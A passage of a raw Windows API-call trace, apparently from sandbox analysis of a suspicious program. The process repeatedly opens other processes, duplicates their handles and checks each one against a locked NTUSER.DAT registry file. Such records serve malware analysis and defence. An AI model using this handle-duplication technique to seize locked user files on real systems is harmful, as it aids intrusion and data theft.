hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.482] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.483] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.483] CloseHandle (hObject=0x670) returned 1 [0154.483] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.483] CloseHandle (hObject=0x680) returned 1 [0154.483] CloseHandle (hObject=0x62c) returned 1 [0154.483] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0154.483] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x284, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.483] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.484] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.484] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.485] CloseHandle (hObject=0x670) returned 1 [0154.485] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.485] CloseHandle (hObject=0x680) returned 1 [0154.485] CloseHandle (hObject=0x62c) returned 1 [0154.485] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0154.485] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x288, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.485] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.486] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.486] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.487] CloseHandle (hObject=0x670) returned 1 [0154.487] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.487] CloseHandle (hObject=0x680) returned 1 [0154.487] CloseHandle (hObject=0x62c) returned 1 [0154.487] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0154.487] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.487] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.487] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.488] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.488] CloseHandle (hObject=0x670) returned 1 [0154.488] CloseHandle (hObject=0x680) returned 1 [0154.488] CloseHandle (hObject=0x62c) returned 1 [0154.488] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0154.488] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.489] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.491] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.491] CloseHandle (hObject=0x670) returned 1 [0154.491] _wcsicmp (_Str1="\\umpnpmgr.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0154.491] CloseHandle (hObject=0x680) returned 1 [0154.491] CloseHandle (hObject=0x62c) returned 1 [0154.491] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.491] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.492] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.492] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.492] CloseHandle (hObject=0x670) returned 1 [0154.493] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.493] CloseHandle (hObject=0x680) returned 1 [0154.493] CloseHandle (hObject=0x62c) returned 1 [0154.493] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.493] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x84, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.493] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.494] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.494] CloseHandle (hObject=0x670) returned 1 [0154.494] CloseHandle (hObject=0x680) returned 1 [0154.494] CloseHandle (hObject=0x62c) returned 1 [0154.494] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.494] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.495] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.496] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.496] CloseHandle (hObject=0x670) returned 1 [0154.496] CloseHandle (hObject=0x680) returned 1 [0154.496] CloseHandle (hObject=0x62c) returned 1 [0154.496] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.496] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x164, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.497] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.498] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.498] CloseHandle (hObject=0x670) returned 1 [0154.498] CloseHandle (hObject=0x680) returned 1 [0154.498] CloseHandle (hObject=0x62c) returned 1 [0154.498] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.498] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x168, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.499] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.499] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.499] CloseHandle (hObject=0x670) returned 1 [0154.499] CloseHandle (hObject=0x680) returned 1 [0154.499] CloseHandle (hObject=0x62c) returned 1 [0154.499] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.499] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x170, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.500] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.501] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.501] CloseHandle (hObject=0x670) returned 1 [0154.501] _wcsicmp (_Str1="\\CatalogChangeListener-294-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.501] CloseHandle (hObject=0x680) returned 1 [0154.501] CloseHandle (hObject=0x62c) returned 1 [0154.501] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.501] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.501] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.502] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.503] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.503] CloseHandle (hObject=0x670) returned 1 [0154.503] CloseHandle (hObject=0x680) returned 1 [0154.503] CloseHandle (hObject=0x62c) returned 1 [0154.503] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.503] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.503] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.504] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.504] CloseHandle (hObject=0x670) returned 1 [0154.504] CloseHandle (hObject=0x680) returned 1 [0154.504] CloseHandle (hObject=0x62c) returned 1 [0154.504] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.504] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.511] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.512] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.512] CloseHandle (hObject=0x670) returned 1 [0154.512] CloseHandle (hObject=0x680) returned 1 [0154.512] CloseHandle (hObject=0x62c) returned 1 [0154.512] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.512] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.513] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.514] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.514] CloseHandle (hObject=0x670) returned 1 [0154.514] CloseHandle (hObject=0x680) returned 1 [0154.514] CloseHandle (hObject=0x62c) returned 1 [0154.514] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.514] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.514] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.515] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.516] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.516] CloseHandle (hObject=0x670) returned 1 [0154.516] CloseHandle (hObject=0x680) returned 1 [0154.517] CloseHandle (hObject=0x62c) returned 1 [0154.517] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.517] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.517] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.518] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.518] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.519] CloseHandle (hObject=0x670) returned 1 [0154.519] CloseHandle (hObject=0x680) returned 1 [0154.519] CloseHandle (hObject=0x62c) returned 1 [0154.519] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.519] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.520] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.520] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.520] CloseHandle (hObject=0x670) returned 1 [0154.520] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.520] CloseHandle (hObject=0x680) returned 1 [0154.520] CloseHandle (hObject=0x62c) returned 1 [0154.521] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.521] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.521] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.522] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.522] CloseHandle (hObject=0x670) returned 1 [0154.522] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.522] CloseHandle (hObject=0x680) returned 1 [0154.522] CloseHandle (hObject=0x62c) returned 1 [0154.522] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0154.522] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.522] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.523] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.523] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.523] CloseHandle (hObject=0x670) returned 1 [0154.524] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.524] CloseHandle (hObject=0x680) returned 1 [0154.524] CloseHandle (hObject=0x62c) returned 1 [0154.524] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.524] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.524] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.525] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.525] CloseHandle (hObject=0x670) returned 1 [0154.525] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.525] CloseHandle (hObject=0x680) returned 1 [0154.525] CloseHandle (hObject=0x62c) returned 1 [0154.525] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.525] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.526] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.528] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.528] CloseHandle (hObject=0x670) returned 1 [0154.528] CloseHandle (hObject=0x680) returned 1 [0154.528] CloseHandle (hObject=0x62c) returned 1 [0154.528] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.528] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.529] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.530] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.530] CloseHandle (hObject=0x670) returned 1 [0154.530] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.530] CloseHandle (hObject=0x680) returned 1 [0154.530] CloseHandle (hObject=0x62c) returned 1 [0154.530] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.530] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.530] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.530] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.531] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.531] CloseHandle (hObject=0x670) returned 1 [0154.531] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.531] CloseHandle (hObject=0x680) returned 1 [0154.531] CloseHandle (hObject=0x62c) returned 1 [0154.531] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.531] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.532] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.532] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.533] CloseHandle (hObject=0x670) returned 1 [0154.533] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.533] CloseHandle (hObject=0x680) returned 1 [0154.533] CloseHandle (hObject=0x62c) returned 1 [0154.533] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.533] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.533] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.534] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.534] CloseHandle (hObject=0x670) returned 1 [0154.534] _wcsicmp (_Str1="\\lastalive1.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.534] CloseHandle (hObject=0x680) returned 1 [0154.534] CloseHandle (hObject=0x62c) returned 1 [0154.534] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.534] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.534] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.535] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.537] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.537] CloseHandle (hObject=0x670) returned 1 [0154.537] _wcsicmp (_Str1="\\lastalive0.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.537] CloseHandle (hObject=0x680) returned 1 [0154.537] CloseHandle (hObject=0x62c) returned 1 [0154.537] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.537] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, 